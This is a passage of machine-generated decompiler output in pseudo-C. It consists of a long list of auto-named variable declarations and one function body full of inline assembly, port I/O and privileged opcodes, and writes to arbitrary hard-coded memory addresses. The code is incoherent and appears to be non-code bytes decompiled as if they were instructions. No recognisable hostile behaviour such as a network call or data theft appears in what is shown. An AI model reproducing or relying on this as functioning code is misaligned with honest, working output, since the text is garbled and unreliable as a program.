				signed char _t376;
				signed char _t377;
				signed char _t378;
				signed char _t379;
				signed char _t380;
				signed char _t381;
				signed int _t382;
				signed int* _t383;
				intOrPtr* _t386;
				signed int _t388;
				intOrPtr* _t390;
				signed int _t391;
				signed char _t393;
				intOrPtr* _t395;
				signed char _t396;
				signed int _t397;
				intOrPtr* _t398;
				signed int _t399;
				signed int _t400;
				signed int* _t402;
				signed int _t405;
				signed int _t407;
				signed char _t410;
				signed int _t413;
				signed int _t414;
				intOrPtr* _t415;
				signed char _t416;
				signed char _t417;
				char* _t418;
				intOrPtr* _t419;
				signed char _t420;
				void* _t424;
				intOrPtr* _t426;
				signed int _t427;
				signed int _t428;
				signed char _t430;
				intOrPtr* _t431;
				void* _t432;
				signed int _t433;
				void* _t435;
				intOrPtr* _t436;
				signed char _t440;
				signed char _t441;
				intOrPtr* _t442;
				signed int* _t443;
				signed int* _t444;
				signed int* _t445;
				signed int _t447;
				void* _t448;
				signed int _t449;
				signed int* _t451;
				signed char _t453;
				signed int _t454;
				intOrPtr* _t455;
				signed int _t456;
				signed int _t459;
				signed int _t461;
				signed int* _t463;
				signed int* _t469;
				intOrPtr* _t473;
				signed int* _t475;
				signed int _t476;
				void* _t477;
				signed int _t478;

				_t313 = __eax | 0xffffffff9fe00603;
				asm("sbb ecx, [0xb8000102]");
				_pop(ds);
				asm("in al, dx");
				asm("adc eax, [esi]");
				 *((intOrPtr*)(__esi + 0x113ec1b)) =  *((intOrPtr*)(__esi + 0x113ec1b)) + __ecx;
				 *__edx =  *__edx + _t313;
				asm("adc eax, [esi]");
				_t315 = (_t313 & __ecx) + (_t313 & __ecx);
				asm("sbb ebp, esp");
				asm("adc eax, [ecx]");
				 *((intOrPtr*)(_t476 + 0x10eab1e)) =  *((intOrPtr*)(_t476 + 0x10eab1e)) + _t315;
				 *((intOrPtr*)(_t476 + 0x101d91f)) =  *((intOrPtr*)(_t476 + 0x101d91f)) + __ecx;
				_t426 = __ecx + __ecx;
				_pop(ds);
				asm("scasd");
				 *_t426 =  *_t426 + _t315;
				_t316 = _t315 + _t426;
				_pop(ds);
				asm("scasd");
				 *_t426 =  *_t426 + _t316;
				_t410 = __ebx + __edx;
				_pop(ds);
				asm("scasd");
				 *_t426 =  *_t426 + _t316;
				 *((intOrPtr*)(__esi + 0x16)) =  *((intOrPtr*)(__esi + 0x16)) + _t316;
				_t317 = _t316 | 0x17000102;
				_pop(ss);
				asm("scasd");
				 *_t426 =  *_t426 + _t317;
				 *((intOrPtr*)(__esi + __edx + 0x1020d)) =  *((intOrPtr*)(__esi + __edx + 0x1020d)) + _t426;
				_t453 = _t317;
				_t319 = __esi - 0xaf;
				 *_t453 =  *_t453 + _t319;
				_t427 = _t426 + _t410;
				asm("scasd");
				 *_t427 =  *_t427 + _t319;
				 *((intOrPtr*)(__edx + 0x6020d2c)) =  *((intOrPtr*)(__edx + 0x6020d2c)) + _t410;
				 *__edx =  *__edx + _t319;
				asm("das");
				_pop(ds);
				_t321 = _t319 | 0xffffffffeb000702;
				asm("das");
				_push(_t321);
				asm("sbb dh, [esi]");
				 *((intOrPtr*)(_t321 + 0xf)) =  *((intOrPtr*)(_t321 + 0xf)) + _t321;
				asm("pushad");
				asm("sbb dl, [esi]");
				 *_t410 =  *_t410 + __edx;
				 *(_t476 + 0x1a) =  *(_t476 + 0x1a) ^ _t321;
				_push(ss);
				 *0x61a6e30 =  *0x61a6e30 + _t410;
				 *_t427 =  *_t427 + _t410;
				asm("sbb al, 0x1f");
				_push(ss);
				_push(es);
				 *((intOrPtr*)(_t321 + 0x1c)) =  *((intOrPtr*)(_t321 + 0x1c)) + __edx;
				 *(_t476 + 0x1a) =  *(_t476 + 0x1a) & _t410;
				 *[ss:eax+0xf] =  *[ss:eax+0xf] + (_t321 | 0x3c000602);
				 *__edi =  *__edi + __edx;
				 *0x66000134 =  *0x66000134 & 0x0000001a;
				ss = ss;
				asm("scasd");
				 *_t427 =  *_t427 + 0x1a;
				 *((intOrPtr*)(_t453 + __edx + 0x1020d)) =  *((intOrPtr*)(_t453 + __edx + 0x1020d)) + _t427;
				_t447 = ss;
				 *(_t447 - 0x2affff00) =  *(_t447 - 0x2affff00) ^ _t427;
				asm("sbb al, [ecx]");
				 *_t427 =  *_t427 ^ 0x0000001a;
				asm("sbb eax, [ecx]");
				_t413 = 0x60 + _t427;
				 *0xfb000102 =  *0xfb000102 ^ _t427;
				 *0x66000102 =  *0x66000102 ^ _t427;
				ss = ss;
				_push(ss);
				_t440 = __edx &  *(_t447 + 0x1100060d);
				 *(_t447 + 0x1a00010d) =  *(_t447 + 0x1a00010d) ^ _t440;
				 *(_t447 + 0x25000109) =  *(_t447 + 0x25000109) ^ _t453;
				_t332 = 0xfffffffffff3fd32 ^ _t447;
				 *_t427 =  *_t427 + _t332;
				_t333 = _t332 + _t413;
				asm("clc");
				 *_t427 =  *_t427 + _t333;
				 *_t453 =  *_t453 + _t440;
				 *0x3d000102 =  *0x3d000102 ^ _t427;
				_t414 = _t413 ^ _t447;
				asm("adc [ecx], al");
				 *((intOrPtr*)(_t427 + _t453 - 0x51)) =  *((intOrPtr*)(_t427 + _t453 - 0x51)) + _t427;
				 *_t427 =  *_t427 + 0x1a;
				 *((intOrPtr*)(_t453 + 0x31)) =  *((intOrPtr*)(_t453 + 0x31)) + _t440;
				_t448 = _t333;
				asm("scasd");
				 *_t453 =  *_t453 + _t440;
				ss = ss;
				asm("sgdt [es:eax]");
				_t441 = _t440 ^  *(_t448 + _t476 * 4);
				 *_t427 =  *_t427 + 0x1a;
				 *((intOrPtr*)(_t427 + 0x34)) =  *((intOrPtr*)(_t427 + 0x34)) + _t427;
				_t338 = ((_t447 | 0x33710006) + _t427 | 0x64000102) ^ 0x000000af;
				 *_t427 =  *_t427 + _t338;
				 *((intOrPtr*)(_t448 + 0x34)) =  *((intOrPtr*)(_t448 + 0x34)) + 0x30;
				_t449 = _t338;
				_t341 = 0xd;
				 *0xd =  *0xd + 0xd;
				if( *0xd <= 0) {
					_t405 = _t449;
					_t449 = 0xd;
					asm("scasd");
					 *_t453 =  *_t453 + 0xd;
					_push(es);
					_t453 = 0x80561c9f;
					_t407 = _t476;
					_t476 = _t405 | 0x35330001;
					asm("popfd");
					_t341 = _t407 ^ 0xffffffff80570000;
					_t441 = _t441 ^  *(0xd + _t476 * 4);
					 *_t427 =  *_t427 + 0xd;
					 *((intOrPtr*)(_t341 + 0x3300af35)) =  *((intOrPtr*)(_t341 + 0x3300af35)) + _t441;
					 *((intOrPtr*)(_t441 + 0x36)) =  *((intOrPtr*)(_t441 + 0x36)) + _t476;
					asm("out 0x1c, eax");
					asm("enter 0x20, 0x0");
				}
				 *_t341 =  *_t341 + _t341;
				 *_t341 =  *_t341 + _t341;
				_t342 = _t453;
				_t454 = _t341;
				 *((intOrPtr*)(_t342 + 0x1005121)) =  *((intOrPtr*)(_t342 + 0x1005121)) + _t342;
				_t442 = _t441 + _t441;
				 *_t342 =  *_t342 & _t342;
				 *_t342 =  *_t342 + _t342;
				 *((intOrPtr*)(_t454 + 0x6021a000)) =  *((intOrPtr*)(_t454 + 0x6021a000)) + _t442;
				 *_t414 =  *_t414 + _t342;
				_t415 = _t414 + _t342;
				 *_t342 =  *_t342 & _t342;
				 *_t342 =  *_t342 + _t342;
				 *((intOrPtr*)(_t454 + 0x6821ac00)) =  *((intOrPtr*)(_t454 + 0x6821ac00)) + _t442;
				 *0x20f400 =  *0x20f400 + _t342;
				 *_t342 =  *_t342 + _t342;
				 *((intOrPtr*)(_t454 + 0x6e21c200)) =  *((intOrPtr*)(_t454 + 0x6e21c200)) + _t442;
				 *_t454 =  *_t454 + _t342;
				_t343 = _t342 + _t415;
				 *_t343 =  *_t343 & _t343;
				 *_t343 =  *_t343 + _t343;
				 *((intOrPtr*)(_t415 + 0x7621da00)) =  *((intOrPtr*)(_t415 + 0x7621da00)) + _t442;
				 *_t454 =  *_t454 + _t343;
				 *_t427 =  *_t427 + _t427;
				 *_t343 =  *_t343 & _t343;
				 *_t343 =  *_t343 + _t343;
				 *((intOrPtr*)(_t415 + 0x7b21ec00)) =  *((intOrPtr*)(_t415 + 0x7b21ec00)) + _t442;
				 *_t449 =  *_t449 + _t343;
				 *_t415 =  *_t415 + _t415;
				 *_t343 =  *_t343 & _t343;
				 *_t343 =  *_t343 + _t343;
				 *((intOrPtr*)(_t415 + 0x7b220100)) =  *((intOrPtr*)(_t415 + 0x7b220100)) + _t442;
				 *_t449 =  *_t449 + _t343;
				 *((intOrPtr*)(_t343 + 0x27)) =  *((intOrPtr*)(_t343 + 0x27)) + _t415;
				 *((intOrPtr*)(_t454 - 0x68ddee00)) =  *((intOrPtr*)(_t454 - 0x68ddee00)) + _t442;
				 *_t449 =  *_t449 + _t343;
				 *_t454 =  *_t454 + _t415;
				 *_t343 =  *_t343 & _t343;
				 *_t343 =  *_t343 + _t343;
				 *((intOrPtr*)(_t454 - 0x6cf1dae8)) =  *((intOrPtr*)(_t454 - 0x6cf1dae8)) + _t343;
				 *_t343 =  *_t343 + _t427;
				 *_t454 =  *_t454 + _t343;
				 *_t343 =  *_t343 & _t343;
				 *_t343 =  *_t343 + _t343;
				 *((intOrPtr*)(_t427 + 0x6e222118)) =  *((intOrPtr*)(_t427 + 0x6e222118)) + _t442;
				 *_t343 =  *_t343 + _t427;
				 *((intOrPtr*)(_t476 + 0x21)) =  *((intOrPtr*)(_t476 + 0x21)) + _t442;
				 *_t343 =  *_t343 + _t343;
				 *_t343 =  *_t343 + _t343;
				_t344 = _t415;
				_t416 = _t343;
				 *_t442 =  *_t442 + _t416;
				_t417 = _t416 &  *(_t442 - 0x3fff800);
				asm("daa");
				 *_t344 =  *_t344 + _t344;
				 *_t344 =  *_t344 + _t344;
				_t345 = _t454;
				_t455 = _t344;
				 *((intOrPtr*)(_t345 + 0x22)) =  *((intOrPtr*)(_t345 + 0x22)) + _t442;
				asm("in al, 0x0");
				_t346 = _t345 |  *_t345;
				 *((intOrPtr*)(_t455 - 0xadda500)) =  *((intOrPtr*)(_t455 - 0xadda500)) + _t442;
				 *((intOrPtr*)(_t346 + _t346)) =  *((intOrPtr*)(_t346 + _t346)) + _t427;
				 *_t346 =  *_t346 & _t346;
				 *_t346 =  *_t346 + _t346;
				 *((intOrPtr*)(_t427 + 0x6e03f600)) =  *((intOrPtr*)(_t427 + 0x6e03f600)) + _t442;
				 *((intOrPtr*)(_t346 + _t346)) =  *((intOrPtr*)(_t346 + _t346)) + _t427;
				 *_t346 =  *_t346 & _t346;
				 *_t346 =  *_t346 + _t346;
				 *((intOrPtr*)(_t455 + 0x6e227300)) =  *((intOrPtr*)(_t455 + 0x6e227300)) + _t442;
				 *((intOrPtr*)(_t346 + _t346)) =  *((intOrPtr*)(_t346 + _t346)) + _t427;
				_t451 = 0x28;
				 *_t346 =  *_t346 & _t346;
				 *_t346 =  *_t346 + _t346;
				 *((intOrPtr*)(_t427 + 0x6e229800)) =  *((intOrPtr*)(_t427 + 0x6e229800)) + _t442;
				 *((intOrPtr*)(_t346 + _t346)) =  *((intOrPtr*)(_t346 + _t346)) + _t427;
				_push(ds);
				 *_t346 =  *_t346 & _t346;
				 *_t346 =  *_t346 + _t346;
				 *((intOrPtr*)(_t455 - 0x6cf1dae8)) =  *((intOrPtr*)(_t455 - 0x6cf1dae8)) + _t346;
				 *((intOrPtr*)(_t346 + _t346)) =  *((intOrPtr*)(_t346 + _t346)) + _t427;
				asm("insd");
				 *_t346 =  *_t346 & _t346;
				 *_t346 =  *_t346 + _t346;
				 *((intOrPtr*)(_t427 + 0x6e222118)) =  *((intOrPtr*)(_t427 + 0x6e222118)) + _t442;
				 *((intOrPtr*)(_t346 + _t346)) =  *((intOrPtr*)(_t346 + _t346)) + _t427;
				 *_t346 = gs;
				 *_t346 =  *_t346 + _t346;
				 *_t346 =  *_t346 + _t346;
				_t347 = _t455;
				_t456 = _t346;
				 *((intOrPtr*)(_t347 + 0xc010722)) =  *((intOrPtr*)(_t347 + 0xc010722)) + _t427;
				_t348 = _t347 + _t347;
				 *_t348 =  *_t348 - _t348;
				 *_t348 =  *_t348 + _t348;
				 *((intOrPtr*)(_t456 + 0x2922bf00)) =  *((intOrPtr*)(_t456 + 0x2922bf00)) + _t442;
				 *0x294c00 =  *0x294c00 + _t427;
				 *_t348 =  *_t348 + _t348;
				 *((intOrPtr*)(_t456 + 0x6722f800)) =  *((intOrPtr*)(_t456 + 0x6722f800)) + _t442;
				 *_t456 =  *_t456 + _t427;
				 *((intOrPtr*)(_t348 + 0x29)) =  *((intOrPtr*)(_t348 + 0x29)) + _t348;
				 *((intOrPtr*)(_t456 - 0x6adcbb00)) =  *((intOrPtr*)(_t456 - 0x6adcbb00)) + _t442;
				 *_t427 =  *_t427 + _t442;
				 *_t348 =  *_t348 + _t348;
				_t349 = _t348 -  *_t348;
				 *_t349 =  *_t349 + _t349;
				 *((intOrPtr*)(_t456 + 0x29236800)) =  *((intOrPtr*)(_t456 + 0x29236800)) + _t442;
				 *_t442 =  *_t442 + _t442;
				 *((intOrPtr*)(_t442 + _t476)) =  *((intOrPtr*)(_t442 + _t476)) + _t427;
				 *_t349 =  *_t349 + _t349;
				 *((intOrPtr*)(_t427 - 0x48dc6b00)) =  *((intOrPtr*)(_t427 - 0x48dc6b00)) + _t442;
				 *_t417 =  *_t417 + _t442;
				 *_t456 =  *_t456 + _t417;
				 *_t349 =  *_t349 & _t349;
				 *_t349 =  *_t349 + _t349;
				 *((intOrPtr*)(_t456 - 0x6cf1dae8)) =  *((intOrPtr*)(_t456 - 0x6cf1dae8)) + _t349;
				 *_t456 =  *_t456 + _t442;
				 *((intOrPtr*)(_t442 + _t476)) =  *((intOrPtr*)(_t442 + _t476)) + _t349;
				 *((intOrPtr*)(_t427 + 0x24)) =  *((intOrPtr*)(_t427 + 0x24)) + _t456;
				_push(ss);
				 *0x0000002D =  *((intOrPtr*)(0x2d)) + _t417;
				 *2 =  *2 + 2;
				 *2 =  *2 + 2;
				 *((intOrPtr*)(_t417 + 0x10)) =  *((intOrPtr*)(_t417 + 0x10)) + _t427;
				 *_t442 =  *_t442 + 1;
				asm("sbb [eax], al");
				L3();
				 *0x52106B02 =  *((intOrPtr*)(0x52106b02)) + _t442;
				_t418 = _t417 +  *_t442;
				 *((intOrPtr*)(_t478 + _t476)) =  *((intOrPtr*)(_t478 + _t476)) + _t427;
				_t459 = _t349;
				 *((intOrPtr*)(_t418 + 0x10)) =  *((intOrPtr*)(_t418 + 0x10)) + _t427;
				 *_t418 =  *_t418 + 0x1c;
				 *0x00000004 =  *0x00000004 + 2;
				 *((intOrPtr*)(_t459 - 0x35db8700)) =  *((intOrPtr*)(_t459 - 0x35db8700)) + _t442;
				_t419 = _t418 +  *0x2d7800;
				 *0x00000004 =  *0x00000004 + 2;
				 *((intOrPtr*)(_t459 + 0x40f8300)) =  *((intOrPtr*)(_t459 + 0x40f8300)) + _t442;
				_t356 = _t459;
				 *((intOrPtr*)(_t419 + 0x1f04040f)) =  *((intOrPtr*)(_t419 + 0x1f04040f)) + 2;
				 *_t356 =  *_t356 + 2;
				 *[cs:eax] =  *[cs:eax] + 2;
				 *_t356 =  *_t356 + 2;
				_t357 = _t427;
				_t428 = _t356;
				 *((intOrPtr*)(_t442 + 0x20044924)) =  *((intOrPtr*)(_t442 + 0x20044924)) + _t428;
				 *((intOrPtr*)(_t357 + 0x2e)) =  *((intOrPtr*)(_t357 + 0x2e)) + _t428;
				 *((intOrPtr*)(_t428 - 0x37db5f00)) =  *((intOrPtr*)(_t428 - 0x37db5f00)) + _t442;
				_t358 = _t357 + 0x22;
				 *0x00000004 =  *0x00000004 + _t419;
				 *_t358 =  *_t358 & _t358;
				 *_t358 =  *_t358 + 2;
				 *0xFFFFFFFF930E251C =  *((intOrPtr*)(0xffffffff930e251c)) + 2;
				 *0x315000 =  *0x315000 + _t358;
				 *_t358 =  *_t358 + 2;
				 *((intOrPtr*)(_t419 - 0x66f07600)) =  *((intOrPtr*)(_t419 - 0x66f07600)) + 2;
				_t359 = _t358 +  *0x211e00;
				 *_t359 =  *_t359 + 2;
				 *((intOrPtr*)(0xffffffff930e251c)) =  *((intOrPtr*)(0xffffffff930e251c)) + 2;
				 *0x00000004 =  *0x00000004 + _t359;
				 *((intOrPtr*)(_t428 + 0x21)) =  *((intOrPtr*)(_t428 + 0x21)) + _t419;
				 *_t359 =  *_t359 + 2;
				 *_t359 =  *_t359 + 2;
				 *_t359 =  *_t359 + 0xffffff97;
				asm("adc [esp+eax], bh");
				 *[es:edi+0x21] =  *[es:edi+0x21] + 2;
				 *((intOrPtr*)(_t419 + 0x1110ad00)) =  *((intOrPtr*)(_t419 + 0x1110ad00)) + 2;
				_t360 = _t359 + 0x21aa0027;
				 *_t360 =  *_t360 + 2;
				 *_t360 =  *_t360 + 2;
				_t361 = _t428;
				asm("sbb [ecx], ah");
				_t430 = _t360 &  *0x00000004;
				 *_t361 =  *_t361 - 2;
				_push(ds);
				 *_t361 =  *_t361 & _t361;
				 *_t361 =  *_t361 + 2;
				 *((intOrPtr*)(0xffffffff930e251c)) =  *((intOrPtr*)(0xffffffff930e251c)) + 2;
				 *_t361 =  *_t361 + _t430;
				 *0x00000025 =  *((intOrPtr*)(0x25)) + _t442;
				 *((intOrPtr*)(_t419 + 0x4e0f6400)) =  *((intOrPtr*)(_t419 + 0x4e0f6400)) + 2;
				_t431 = _t430 +  *_t361;
				 *0x00000004 =  *0x00000004 + _t419;
				 *_t361 =  *_t361 & _t361;
				 *_t361 =  *_t361 + 2;
				 *((intOrPtr*)(0xffffffff930e251c)) =  *((intOrPtr*)(0xffffffff930e251c)) + 2;
				 *_t431 =  *_t431 + _t431;
				 *((intOrPtr*)(_t361 + 0x32)) =  *((intOrPtr*)(_t361 + 0x32)) + _t431;
				 *_t361 =  *_t361 + 2;
				 *_t361 =  *_t361 + 2;
				 *_t361 =  *_t361 + 9;
				_t362 = _t361 & 0x0029056a;
				_push(ds);
				 *_t362 =  *_t362 & _t362;
				 *_t362 =  *_t362 + 2;
				 *((intOrPtr*)(0xffffffff930e251c)) =  *((intOrPtr*)(0xffffffff930e251c)) + 2;
				 *_t442 =  *_t442 + _t431;
				 *((intOrPtr*)(0x25)) =  *((intOrPtr*)(0x25)) + _t419;
				 *((intOrPtr*)(_t419 + 0x3c252d00)) =  *((intOrPtr*)(_t419 + 0x3c252d00)) + 2;
				_t364 = _t362 + 0x2a + _t442;
				 *_t364 =  *_t364 & _t364;
				 *_t364 =  *_t364 + 2;
				 *((intOrPtr*)(_t419 - 0x66dac400)) =  *((intOrPtr*)(_t419 - 0x66dac400)) + 2;
				_t432 = _t431 +  *_t419;
				 *((intOrPtr*)(_t442 + 4)) =  *((intOrPtr*)(_t442 + 4)) + _t432;
				 *_t364 =  *_t364 + 0x50;
				_t365 = _t364 & 0x002c057f;
				_push(ds);
				 *_t365 =  *_t365 & _t365;
				 *_t365 =  *_t365 + 2;
				 *((intOrPtr*)(0xffffffff930e251c)) =  *((intOrPtr*)(0xffffffff930e251c)) + 2;
				 *0x21e700 =  *0x21e700 + _t432;
				 *_t365 =  *_t365 + 2;
				 *((intOrPtr*)(_t419 + 0x3c257b00)) =  *((intOrPtr*)(_t419 + 0x3c257b00)) + 2;
				_t366 = _t365 + 0x2d;
				_t443 = _t442 + _t419;
				 *_t366 =  *_t366 & _t366;
				 *_t366 =  *_t366 + 2;
				 *((intOrPtr*)(_t432 + 0x6e222118)) =  *((intOrPtr*)(_t432 + 0x6e222118)) + _t443;
				 *0x00000004 =  *0x00000004 + _t432;
				 *0x00000004 =  *0x00000004 + _t419;
				 *_t366 =  *_t366 & _t366;
				 *_t366 =  *_t366 + 2;
				 *((intOrPtr*)(0xffffffff930e251c)) =  *((intOrPtr*)(0xffffffff930e251c)) + 2;
				 *0x00000004 =  *0x00000004 + _t432;
				 *((intOrPtr*)(0x25)) =  *((intOrPtr*)(0x25)) + _t443;
				 *((intOrPtr*)(_t419 + 0x4e259700)) =  *((intOrPtr*)(_t419 + 0x4e259700)) + 2;
				_t433 = _t432 +  *0x00000004;
				 *((intOrPtr*)(_t419 + 4)) =  *((intOrPtr*)(_t419 + 4)) + _t366;
				 *_t366 =  *_t366 + 2;
				 *_t366 =  *_t366 + 2;
				_t461 = _t366;
				_t451[0xbc17849] = _t443 + _t451[0xbc17849];
				 *((intOrPtr*)(_t419 + _t461)) =  *((intOrPtr*)(_t419 + _t461)) + _t443;
				_t420 = _t419 + _t443;
				_push(es);
				_t370 = _t461 & 0x0032064a &  *(_t461 & 0x0032064a);
				 *_t370 =  *_t370 + 2;
				 *((intOrPtr*)(_t433 + 0x6e222118)) =  *((intOrPtr*)(_t433 + 0x6e222118)) + _t443;
				 *_t451 = _t443 +  *_t451;
				 *0x00000004 =  *0x00000004 + _t420;
				 *_t370 =  *_t370 & _t370;
				 *_t370 =  *_t370 + 2;
				 *((intOrPtr*)(0xffffffff930e251c)) =  *((intOrPtr*)(0xffffffff930e251c)) + 2;
				 *_t451 = _t443 +  *_t451;
				 *_t443 = _t443 +  *_t443;
				_t371 = _t370 &  *_t370;
				 *_t371 =  *_t371 + 2;
				 *((intOrPtr*)(_t420 - 0x7cda0000)) =  *((intOrPtr*)(_t420 - 0x7cda0000)) + 2;
				_push(es);
				asm("aaa");
				 *((intOrPtr*)(4 + _t478)) =  *((intOrPtr*)(4 + _t478)) + _t433;
				 *_t371 =  *_t371 + 2;
				 *_t371 =  *_t371 + 2;
				_t372 = 4;
				_t463 = _t371;
				 *_t463 =  *_t463 + _t420;
				asm("clc");
				_push(es);
				if( *0x00000004 >= 2) {
					 *0x00000004 =  *0x00000004 + 2;
					 *0x00000004 =  *0x00000004 + 2;
					 *0x00000056 =  *((intOrPtr*)(0x56)) + _t433;
					_pop(es);
					_t402 = _t463;
					 *[ss:eax] =  *[ss:eax] + 2;
					 *_t402 =  *_t402 + 2;
					_t475 = _t402;
					_t475[9] = _t475[9] + _t420;
					 *_t433 =  *_t433 | 0x0000003d;
					 *((intOrPtr*)(8)) =  *((intOrPtr*)(8)) + 2;
					_t475[0x349a280] = _t443 + _t475[0x349a280];
					_t420 = _t420 |  *_t475;
					 *_t451 =  *_t451 + _t433;
					_t372 = _t475;
					_t463 = 8;
					_t443[0x10029a49] = _t443[0x10029a49] + _t433;
				}
				 *0x22 =  *0x22 + _t443;
				_t463[0x1c837bc2] = _t372 + _t463[0x1c837bc2];
				 *_t420 = _t372 +  *_t420;
				asm("sbb eax, 0x22");
				 *((intOrPtr*)(_t463 - 0x66d90bf8)) =  *((intOrPtr*)(_t463 - 0x66d90bf8)) + _t372;
				_t374 = _t372 +  *_t420 &  *[es:eax];
				 *_t374 =  *_t374 + _t374;
				_t463[0x689bf42] = _t463[0x689bf42] + _t374;
				_t245 = _t374 + 0x2e; // 0x6b009600
				 *((intOrPtr*)(_t374 + _t245)) =  *((intOrPtr*)(_t374 + _t374 + 0x2e)) + _t374;
				_t375 = _t374 &  *_t374;
				 *_t375 =  *_t375 + _t375;
				 *((intOrPtr*)(_t463 - 0x77d8f8f8)) =  *((intOrPtr*)(_t463 - 0x77d8f8f8)) + _t375;
				_t376 = _t375 |  *(_t375 + _t375 + 0x1e);
				 *_t376 =  *_t376 & _t376;
				 *_t376 =  *_t376 + _t376;
				 *((intOrPtr*)(_t463 - 0x6cf1dae8)) =  *((intOrPtr*)(_t463 - 0x6cf1dae8)) + _t376;
				 *_t476 =  *_t476 + _t376;
				asm("aaa");
				_t377 = _t376 &  *_t376;
				 *_t377 =  *_t377 + _t377;
				 *((intOrPtr*)(_t463 - 0x72f1dae8)) =  *((intOrPtr*)(_t463 - 0x72f1dae8)) + _t377;
				_t378 = _t377 |  *_t476;
				_push(ds);
				 *_t378 =  *_t378 & _t378;
				 *_t378 =  *_t378 + _t378;
				 *((intOrPtr*)(_t463 - 0x6cf1dae8)) =  *((intOrPtr*)(_t463 - 0x6cf1dae8)) + _t378;
				 *_t451 =  *_t451 + _t378;
				_t477 = _t476 - 1;
				_t379 = _t378 &  *_t378;
				 *_t379 =  *_t379 + _t379;
				 *((intOrPtr*)(_t420 - 0x15ed5a00)) =  *((intOrPtr*)(_t420 - 0x15ed5a00)) + _t379;
				 *_t451 =  *_t451 | _t379;
				_push(ds);
				 *_t379 =  *_t379 & _t379;
				 *_t379 =  *_t379 + _t379;
				 *((intOrPtr*)(_t463 - 0x6cf1dae8)) =  *((intOrPtr*)(_t463 - 0x6cf1dae8)) + _t379;
				 *_t379 =  *_t379 + _t433;
				asm("pushad");
				_t380 = _t379 &  *_t379;
				 *_t380 =  *_t380 + _t380;
				 *((intOrPtr*)(_t420 - 0x15ed3700)) =  *((intOrPtr*)(_t420 - 0x15ed3700)) + _t380;
				 *_t380 =  *_t380 | _t433;
				_push(ds);
				 *_t380 =  *_t380 & _t380;
				 *_t380 =  *_t380 + _t380;
				 *((intOrPtr*)(_t463 - 0x6cf1dae8)) =  *((intOrPtr*)(_t463 - 0x6cf1dae8)) + _t380;
				 *_t433 =  *_t433 + _t433;
				_t381 = _t380 ^ 0x0000003f;
				 *_t381 =  *_t381 + _t381;
				 *_t381 =  *_t381 + _t381;
				 *_t381 =  *_t381 + 0xffffffe2;
				asm("adc ch, dl");
				 *_t433 =  *_t433 | _t433;
				if( *_t433 == 0) {
					 *_t381 =  *_t381 + _t381;
					 *_t381 =  *_t381 + _t381;
					_t266 = _t381;
					_t381 = _t433;
					asm("sbb [ecx], ah");
					_t433 = _t266 &  *_t463;
					_t443 = _t443 - 1;
					 *_t463 =  *_t463 + _t420;
					 *_t381 =  *_t381 & _t381;
					 *_t381 =  *_t381 + _t381;
					 *((intOrPtr*)(_t463 - 0x6cf1dae8)) =  *((intOrPtr*)(_t463 - 0x6cf1dae8)) + _t381;
					 *_t443 =  *_t443 + _t433;
					 *_t443 =  *_t443 & 0x00000000;
					 *_t381 =  *_t381 + 0x2f;
				}
				asm("das");
				asm("adc bl, [edx]");
				 *_t443 =  *_t443 | _t433;
				asm("adc ah, [edx]");
				 *_t381 =  *_t381 + _t381;
				 *_t381 =  *_t381 + _t381;
				 *_t381 =  *_t381 + 0x4c;
				asm("adc bh, [eax]");
				 *_t420 =  *_t420 | _t433;
				 *_t443 = _t478;
				 *_t381 =  *_t381 + _t381;
				 *_t381 =  *_t381 + _t381;
				 *_t381 =  *_t381 + 0x71;
				asm("adc bh, [ecx+0x8]");
				 *_t443 = _t443 +  *_t443;
				 *_t381 =  *_t381 + 0xffffff8e;
				asm("adc ch, [ebx+0x1e004d08]");
				 *_t381 =  *_t381 & _t381;
				 *_t381 =  *_t381 + _t381;
				 *((intOrPtr*)(_t463 - 0x6cf1dae8)) =  *((intOrPtr*)(_t463 - 0x6cf1dae8)) + _t381;
				 *_t463 =  *_t463 + _t433;
				asm("aas");
				 *_t381 =  *_t381 + _t381;
				 *_t381 =  *_t381 + _t381;
				 *_t381 =  *_t381 + 0xffffffec;
				asm("adc ecx, ecx");
				 *_t463 =  *_t463 | _t433;
				asm("pushfd");
				_t382 = _t381 &  *_t381;
				 *_t382 =  *_t382 + _t382;
				 *((intOrPtr*)(_t433 + 0x6e222118)) =  *((intOrPtr*)(_t433 + 0x6e222118)) + _t443;
				 *_t451 =  *_t451 + _t433;
				 *_t382 =  *_t382 & _t382;
				 *_t382 =  *_t382 + _t382;
				 *((intOrPtr*)(_t463 - 0x6cf1dae8)) =  *((intOrPtr*)(_t463 - 0x6cf1dae8)) + _t382;
				 *_t451 =  *_t451 + _t433;
				 *_t382 =  *_t382 + _t382;
				 *_t382 =  *_t382 + _t382;
				 *_t382 =  *_t382 + 0x26;
				asm("adc al, 0xc9");
				 *_t451 =  *_t451 | _t433;
				asm("int3");
				asm("aas");
				 *_t382 =  *_t382 + _t382;
				 *_t382 =  *_t382 + _t382;
				_t383 = _t463;
				 *((intOrPtr*)(_t477 + 0x500b2827)) =  *((intOrPtr*)(_t477 + 0x500b2827)) + _t433;
				_t383[0x10] = _t383 + _t383[0x10];
				 *_t383 = _t383 +  *_t383;
				 *_t383 = _t383 +  *_t383;
				 *((intOrPtr*)(_t477 + 0x520b4227)) =  *((intOrPtr*)(_t477 + 0x520b4227)) + _t433;
				_t386 = _t382 + _t382 + 1;
				 *_t386 =  *_t386 + _t386;
				 *_t386 =  *_t386 + _t386;
				 *((intOrPtr*)(_t477 + 0x550b8627)) =  *((intOrPtr*)(_t477 + 0x550b8627)) + _t433;
				_t388 = _t383 + _t443;
				 *_t388 =  *_t388 + _t388;
				 *_t388 =  *_t388 + _t388;
				_t435 = _t433 + 1 + _t443;
				asm("daa");
				_t390 = ds;
				 *_t390 =  *_t390 + _t435;
				_t444 =  &(_t443[0]);
				 *_t390 =  *_t390 + _t390;
				 *_t390 =  *_t390 + _t390;
				_t391 = _t388;
				_t436 = _t435 + _t444;
				asm("daa");
				asm("fisttp qword [ebx]");
				 *((intOrPtr*)(_t444 + _t391 * 2)) =  *((intOrPtr*)(_t444 + _t391 * 2)) + 0xb;
				 *_t391 =  *_t391 + _t391;
				 *_t391 =  *_t391 + _t391;
				_t469 = _t391;
				 *_t436 =  *_t436 + 0xb;
				_t393 = _t390 - 0xb;
				asm("pushfd");
				_t445 =  &(_t444[0]);
				 *_t393 =  *_t393 + _t393;
				 *_t393 =  *_t393 + _t393;
				 *((intOrPtr*)(_t477 + 0x600c4d27)) =  *((intOrPtr*)(_t477 + 0x600c4d27)) + _t436;
				_t395 = _t469 + _t445;
				 *_t395 =  *_t395 + _t395;
				 *_t395 =  *_t395 + _t395;
				_t396 = _t393;
